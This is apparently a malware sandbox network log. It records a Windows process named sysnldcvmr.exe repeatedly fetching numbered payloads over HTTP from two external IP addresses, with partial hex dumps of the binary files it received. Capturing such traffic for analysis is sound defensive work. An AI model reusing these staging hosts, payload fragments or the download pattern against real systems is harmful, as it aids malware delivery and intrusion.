Dec 5, 2024 17:34:27.085015059 CET	248	IN	Data Raw: 7a fe 71 03 99 6d 41 8c fb 0c b8 8a 45 80 8e 7f ee d8 c3 f9 c4 c0 8c 7f b4 fd 48 e2 80 d4 a2 0b e7 83 a2 eb b5 e0 d3 1c 9b c2 5d 36 a2 1a fd fc b3 74 e2 3a 01 a3 46 ae f8 b7 c7 f6 76 71 10 6c 44 90 f8 85 c7 d1 11 19 b7 46 54 d6 b3 fe b3 a2 7c 9a Data Ascii: zqmAEH]6t:FvqlDFT\|JG9_,l{!G6eMqP_dUxqZI^lxA`_}Kc7aRk/;V)(9!U}hs0{TMuVZ1_7<zjv3
Dec 5, 2024 17:34:27.085680962 CET	1236	IN	Data Raw: fc 04 b1 a3 61 a9 3e e9 b8 4f 99 39 08 9c 69 da 46 18 36 3a 4b 73 dc 66 d7 fd c6 fb 18 c4 f0 71 ec dd 69 3d 4e 7f d9 ab 61 42 45 69 3f 09 c2 f8 94 ed f4 9a d9 59 30 4f 65 5b 90 4f 6d 9a d5 80 e7 09 b9 42 31 f9 9c c9 1a 0a 46 5f a8 4d 51 63 eb a7 Data Ascii: a>O9iF6:Ksfqi=NaBEi?Y0Oe[OmB1F_MQc ~)sWh7z4>(our*Q< M9K=2B[,/+?~gg).L{A]rbAx=p5KZ;ZrZ_f5dQUe
Dec 5, 2024 17:34:27.085721016 CET	1236	IN	Data Raw: c7 b6 4a 74 d2 29 ae 30 5a 13 0d c5 bd ad 85 62 e6 41 ba 2c db e4 33 17 af 92 97 e8 c2 50 6f d3 93 2b 1a d9 ef c8 8c ad 28 76 b1 0a 03 22 aa a4 9d d6 19 b7 f4 a3 21 68 33 93 55 49 99 92 85 49 83 f2 c1 f7 84 ba 94 17 67 0a b6 68 7c b3 3e 5f 83 de Data Ascii: Jt)0ZbA,3Po+(v"!h3UIIgh\|>_C+]`OG3de{tlnAj}xAD\|kH9GV^zmT{y;c}w3pRy<V=5a=dUYW-XW>1-2$i00*vq=,P
Dec 5, 2024 17:34:27.085731983 CET	248	IN	Data Raw: 4d 81 90 a2 d9 c9 ea 87 af e7 54 a4 00 ee 8f 86 4d 10 1b 06 cf bd 41 22 9f f2 47 09 3b 4c 20 17 59 91 37 2b c7 68 ae 66 7e 0f 1e 64 ca 7d 4d 56 36 9b 98 57 4e 5b 31 b4 bc 26 40 53 81 3d 1a 94 77 ce 40 60 b6 2c f1 68 f6 fc 84 5d 67 33 81 46 d2 a2 Data Ascii: MTMA"G;L Y7+hf~d}MV6WN[1&@S=w@`,h]g3Fq${:T;;hkRfjF7aC;@58Ht}uos(h/R#`qk1#a_Jx;JO)j <SmPC9P/ScTvD6>$Z
Dec 5, 2024 17:34:27.087491035 CET	1236	IN	Data Raw: 4e 19 dd 3f ca 7c 76 56 25 cf d8 3b bc 0b cb e3 6b 61 d1 e8 74 ba 7b 9f f2 d9 3c 68 04 7d 8e 0f 0c b1 61 58 b2 89 2e a3 d7 a5 a6 67 de 63 77 82 29 21 e5 dc b8 b5 12 44 63 2f 26 6e 80 a8 59 93 9f f3 cb a5 38 f6 7d 47 18 0a fd 1a 10 c3 fc da 46 76 Data Ascii: N?\|vV%;kat{<h}aX.gcw)!Dc/&nY8}GFvfnz)W'#vqDVkjGT$@o\|fRdgFUVt't99#7><[CwN^>nxLWU63tuI-KS<9~
Dec 5, 2024 17:34:27.087595940 CET	1236	IN	Data Raw: e5 38 c4 33 36 b0 03 f5 cd c9 c0 30 b1 37 44 42 dc 55 49 55 be c3 68 9c 69 c1 11 97 33 09 f5 76 ba 2b 0b 44 51 96 3f 74 91 be 35 c3 11 5f 83 8f cf 2a 84 ec eb a0 7d 4e 67 ca 43 62 ca 3b 51 15 6c 2a 2d 10 a2 fa b7 6f fe 5b 39 e1 7d f2 d3 40 47 ee Data Ascii: 83607DBUIUhi3v+DQ?t5_}NgCb;Ql-o[9}@Gg~@kk3;w=eZLp<0 X6Gj6b1T2<=dMp.t/>,7HD)a,Cs} %)CLXw,df$F>k
Dec 5, 2024 17:34:27.206928015 CET	1236	IN	Data Raw: 0a 6a 9f 08 33 5a b8 00 48 32 c0 9b 00 87 ff 75 44 54 a0 95 d1 eb 90 73 bc 0a c4 df 11 25 1f 31 aa b6 c3 e9 8c f3 97 77 2f 07 de 35 8c cb ba ad dd 7f 5a 81 a2 04 d4 61 14 71 3a 99 5f 6b 8e a0 d8 d1 1f 7d 48 03 a6 3a b5 d6 73 77 b7 85 37 8f 19 14 Data Ascii: j3ZH2uDTs%1w/5Zaq:_k}H:sw7d%hkc}s9BaOQQs?pisbbMFvQSE@l=)0x"./<x&+n>14#<Xo_:*q6!9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.11	50050	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:34:29.569645882 CET	166	OUT	GET /5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:34:30.871196032 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:34:30 GMT Content-Type: application/octet-stream Content-Length: 66816 Last-Modified: Thu, 05 Dec 2024 16:18:27 GMT Connection: keep-alive ETag: "6751d253-10500" Accept-Ranges: bytes Data Raw: 59 c8 13 50 1d f8 00 28 d4 3c 88 34 df 2b 4d 68 41 bc 72 70 ee 95 59 33 21 ac df a3 da 03 6e e1 9c 2f 7d c1 43 68 fd e7 23 38 43 6a 3b b3 0a 09 d6 00 18 a1 97 80 41 bb ee 53 60 95 b4 4b 94 36 fb 6b 23 f1 38 23 5f 5e b1 cc 57 ab e1 40 5f 96 22 6c 28 95 9b eb bc 8a 30 0f 9c d5 a9 d6 78 ae c9 24 73 55 19 2c 3f 43 87 88 19 3a e6 96 f8 ab a9 bb 9f 2a d3 90 bc 5e 4f 8f e3 37 56 8f d7 1c b4 67 1a 15 23 da 86 cd 87 6d f1 6d d3 9a c3 52 f8 c9 86 11 28 75 8e b0 49 f1 80 55 f8 20 01 99 bd 5e 01 23 f9 03 ba b4 ce 7e 70 67 36 02 f3 67 dc 6f 71 bc 54 48 14 d2 cb ec fd ff c1 5b f9 db 3f 73 54 b2 37 94 20 dc d2 62 83 57 4f 56 4a f2 d4 16 82 ea 1c 43 45 76 8b 93 95 d7 74 d2 53 86 f4 07 57 28 0a 98 f0 2e 4d 2d 61 c0 ac c8 eb 46 79 7d 6b 1b d4 aa e3 66 f9 df 88 7f 3e 1b 68 de 2b dc 80 f6 8b 14 02 0c 52 d8 eb 05 75 99 8f cf d1 31 5d 72 f6 c3 04 0f 22 6e 0a 4c 9d 6a db 4c 65 8b b0 dd cb c0 12 9a 0a aa cb 8c d6 09 0f 2e 59 fd 21 3b 06 72 63 2f d9 19 c7 6b fa 10 7b b9 44 cb f6 f8 f5 23 52 e0 c8 1a 00 16 71 b3 ab 8c e2 0c [TRUNCATED] Data Ascii: YP(<4+MhArpY3!n/}Ch#8Cj;AS`K6k#8#_^W@_"l(0x$sU,?C:^O7Vg#mmR(uIU ^#~pg6goqTH[?sT7 bWOVJCEvtSW(.M-aFy}kf>h+Ru1]r"nLjLe.Y!;rc/k{D#RqG}57= c#X7o/fU3RyFU<GTYRpL4d_a,r-E2//&-W&]+LK@6HlOcR$pZZQcp1;bIr^;~SJ,mWwijEX6o57_IcPmqf/F#u={7z/X59ThJ(pcMRjsrM4o^xSd\6i1>z*)mZCks-'kvV6?hQ^j-m+;<E)r034, =Rl@O#6P_asA\|?g}o k?Z5nD8E%\|QL>G \@ #3zaY[g0aGiG<E#oZR-j]O b\|S,Z?9C&]:jE>90F]qj(>rXn{v^e
Dec 5, 2024 17:34:30.871323109 CET	1236	IN	Data Raw: c6 7d 84 30 24 76 89 f0 37 5b fe 25 aa 52 93 09 22 e8 f0 4c 0a d9 9f e6 45 fe cc ed b4 af 8e 4c e4 d6 b7 de ab a2 e5 09 3c 68 a2 d8 37 ae d1 0f 94 d8 79 62 f8 4b 8c 24 6c 8f 02 df 92 3e b4 00 98 f9 87 60 ed 95 84 3f 74 c3 b9 d3 0e 94 6c fb 0c 4c Data Ascii: }0$v7[%R"LEL<h7ybK$l>`?tlL's%[WX,FTjHihQ<Rr3G<d4LV$@M<_dT\|,g+U[zh^PI_wQvVs\|nXaGIr30pZYz]>
Dec 5, 2024 17:34:30.871336937 CET	1236	IN	Data Raw: a9 48 83 d2 10 f4 b5 8a 35 25 2e 77 45 f8 5d 3f 91 e1 2b a7 1a ab 43 6e ba f5 88 8a b7 01 06 21 4e 06 67 b5 98 56 96 0b 75 8b 11 70 97 42 33 77 ee 76 44 11 f4 b7 76 6b b7 15 ef 25 c1 80 a8 eb 2a ae 34 6f d4 65 d7 ff 02 e9 4b b4 7d 78 99 87 5f 14 Data Ascii: H5%.wE]?+Cn!NgVupB3wvDvk%*4oeK}x_UzOqUR3<mi659wIwh6BqN,kk2g l6my5-67Z'O+M<U\R,Yn/cXtwl'T-
Dec 5, 2024 17:34:30.871499062 CET	672	IN	Data Raw: 08 e2 42 7b 64 54 85 29 7e 35 15 93 c2 d3 c8 02 11 06 ed 8f 60 73 21 07 d0 5a 5b 39 e8 df 93 eb 85 4a 10 b4 32 a3 0e a6 31 81 7e da 45 d1 93 37 a8 3d b3 9a ef 2b 82 34 4c a8 67 bf c1 ed 20 df fb 7a 8c 4f 36 3b f3 43 fd 01 d7 3b da 75 3d 17 4e 03 Data Ascii: B{dT)~5`s!Z[9J21~E7=+4Lg zO6;C;u=NaXc/q\|"I&DF0<=aAlVvxdlX\@0lEB5`FMc*CsOBs0`:R<&^)}ucG9#s[1
Dec 5, 2024 17:34:30.871527910 CET	1236	IN	Data Raw: d9 57 9f 53 30 7b 44 09 d4 4d eb 88 c7 2b 33 1d a1 dc 84 36 03 21 1f 2d 5b d9 ea 42 41 22 b7 64 69 c2 ff 56 76 c8 58 9a dd 5e 5d 06 34 b0 33 88 a2 86 43 5b 16 14 c6 cd 14 6e 7f 28 d4 df 58 9f 6e ee 93 30 ed e5 34 3e 91 af 17 bd 9d a3 d2 14 87 c1 Data Ascii: WS0{DM+36!-[BA"diVvX^]43C[n(Xn04>;hM>t}\r^l8O^]_o,qiM7H)KzOQ!_l5>mtJ"`=Wlf>_NghwR/\|~o$c>"
Dec 5, 2024 17:34:30.871539116 CET	1236	IN	Data Raw: a7 85 a8 10 06 f9 f7 d9 eb 25 72 08 b7 a9 9a ea b8 3a 98 f0 98 8e 29 dd e7 50 bc 36 66 93 31 d4 bc 10 59 df 46 a8 ce 7a 14 5c 6d 67 8d 42 e9 4a c8 09 47 4c d8 d1 16 1e 55 21 ce 2c dd 9a 9e 81 08 40 3d 77 f5 55 1b 6b e4 3e 9a 47 6a 8f 57 a0 fa 6e Data Ascii: %r:)P6f1YFz\mgBJGLU!,@=wUk>GjWnu(nQr{k68fCR,q=K.Gdq-^FpTV_uO=bmq%~4s}*28mpi3N(<.VZXMyrxD7VVm-
Dec 5, 2024 17:34:30.871551991 CET	1236	IN	Data Raw: bd f9 39 67 d2 4a 86 5d 7a 9c ae 55 3b 2f 15 68 53 e2 2b 20 9c 5c b8 f2 9c f5 d8 bf 81 46 12 51 d7 b7 f2 de 19 f2 b5 27 95 d6 03 8d a3 f3 86 8a 76 e0 f9 eb 6f 00 a8 fa 2d b7 ca f2 2c 31 a4 54 88 b8 f9 5d 27 a2 59 83 35 dc 2a 5c 10 16 23 b1 cd 90 Data Ascii: 9gJ]zU;/hS+ \FQ'vo-,1T]'Y5\#;;dZpYQM7#s<Y_-2f?.iAgW%RmmjCGrs?BF4X^"Yn9/tp7nms}n2;]n
Dec 5, 2024 17:34:30.871572018 CET	1236	IN	Data Raw: 6e 69 26 15 28 df fc d4 4f 36 c5 93 ca 6f 8d 58 34 0c f5 53 01 78 2d 10 c6 2d 7c ca 9e 6b 05 69 57 9a 27 54 03 46 09 ca d2 3b 25 0c 10 82 11 fe 2e 45 d8 78 5a f9 7d d2 5f c2 d0 60 53 30 8b 71 01 0a 21 30 86 ee c2 09 4e c8 63 1e 39 5e 80 cf 99 45 Data Ascii: ni&(O6oX4Sx--\|kiW'TF;%.ExZ}_`S0q!0Nc9^EySD6`L0Gk{42BCWv6amV_?}"o_w#~_Pf.ym<-#jD9kX-]kiAudCSd!ve1:`CWac((eHx
Dec 5, 2024 17:34:30.871862888 CET	1236	IN	Data Raw: 37 35 89 38 17 df b7 91 93 b3 36 2d 6a 3d db 8b 22 cc 2d f2 ae 67 c2 2a c9 4a bc f1 70 3c b7 26 5d 32 c7 3d af d2 f6 07 b6 fd ee 97 19 2e ed fe 79 03 e5 d2 9d 70 30 c3 d2 cc 53 04 fc 62 bd c7 64 ec 19 63 9b 48 84 71 d9 b4 84 11 bb 48 d7 b7 5d 54 Data Ascii: 7586-j="-gJp<&]2=.yp0SbdcHqH]T\|1pX3t/I+.?h!7v?NJAE=oaT:O(sRAu P+H~p2.X$I2Hsd hU0ZX$^CQl\$XHv %
Dec 5, 2024 17:34:30.871875048 CET	1236	IN	Data Raw: 11 5b c4 39 88 5b cb cc ca fa bf c3 97 4b 5e 6e 40 5c 80 48 77 01 26 d3 b6 54 43 98 97 77 9e e8 ec f5 f0 c2 a0 9f d6 ff 0c 23 19 98 62 29 c0 5b ad 53 f6 7e f0 5c e3 49 3d 47 09 ff 33 f6 05 cc 4e f4 cc 44 5d a4 82 2b 69 a4 0a 3a a0 79 96 48 3e 2e Data Ascii: [9[K^n@\Hw&TCw#b)[S~\I=G3ND]+i:yH>.!=l$pJsNZ$yy=)X-GfX`PYrFo{[ffqGCT#'!#^ltJeBu6GqY$:EGUry8Dph
Dec 5, 2024 17:34:30.992971897 CET	1236	IN	Data Raw: d7 ae 3f 6d 70 e4 29 ef 9c d2 6f dc 08 b2 55 77 0c 3e 97 5f 45 47 2b d0 ba 0a c1 c6 67 27 c3 5b f6 d9 3b 41 68 24 df 4c 29 84 2b 43 1f 01 ce e7 c2 11 34 66 c4 55 2d 11 b1 43 0e 3a 1f 8f fa 22 cf 2c b8 38 be 9a da a2 d5 14 6d 74 15 9e 4d 83 84 f7 Data Ascii: ?mp)oUw>_EG+g'[;Ah$L)+C4fU-C:",8mtMd"!&;\:PNc/o~M93k]U=?1{K5yo~Xf{7.fqrW8V&mc>uB9}hfEDZ3go.w {1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.11	50052	91.202.233.141	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:34:34.924503088 CET	166	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:34:36.240149975 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:34:36 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.11	50054	91.202.233.141	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:34:39.150943041 CET	166	OUT	GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:34:40.417804956 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:34:40 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.11	50055	91.202.233.141	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:34:43.096632004 CET	166	OUT	GET /3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:34:44.421602011 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:34:44 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.11	50057	91.202.233.141	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:34:46.868303061 CET	166	OUT	GET /4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:34:48.157490969 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:34:47 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.11	50059	91.202.233.141	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:34:51.165313959 CET	166	OUT	GET /5 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 91.202.233.141
Dec 5, 2024 17:34:52.510428905 CET	728	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:34:52 GMT Content-Type: text/html Content-Length: 564 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.11	50061	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:34:57.347877026 CET	166	OUT	GET /1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:34:58.674635887 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:34:58 GMT Content-Type: application/octet-stream Content-Length: 9472 Last-Modified: Tue, 03 Dec 2024 13:03:44 GMT Connection: keep-alive ETag: "674f01b0-2500" Accept-Ranges: bytes Data Raw: a8 ae a9 45 71 6e c0 b6 37 92 82 98 6e c2 a5 8e 2a 25 0f 76 20 75 26 50 55 1b ea 98 8e dc 4b 3a 96 50 b2 58 9e 09 77 fc 6a 3e b2 ab 3f 68 e1 72 12 22 42 c3 f5 05 48 2b 3c f4 a3 5f 81 f1 69 40 de 88 46 74 8c a1 91 28 1e b3 2a b1 73 49 65 e4 30 ef 87 61 6c 0a 1b 2e 93 42 4d 1a 5f 8f db c0 ee 24 22 98 b5 6f 90 1b 36 1f 11 c7 a2 b9 2a e5 36 35 cf 09 16 aa fa 26 f0 e6 ac 23 26 a8 73 51 08 65 c5 6e 1a f7 9d 52 1b ba 02 48 1d c4 af c4 1a b4 1f ed be cd d6 16 b3 78 f7 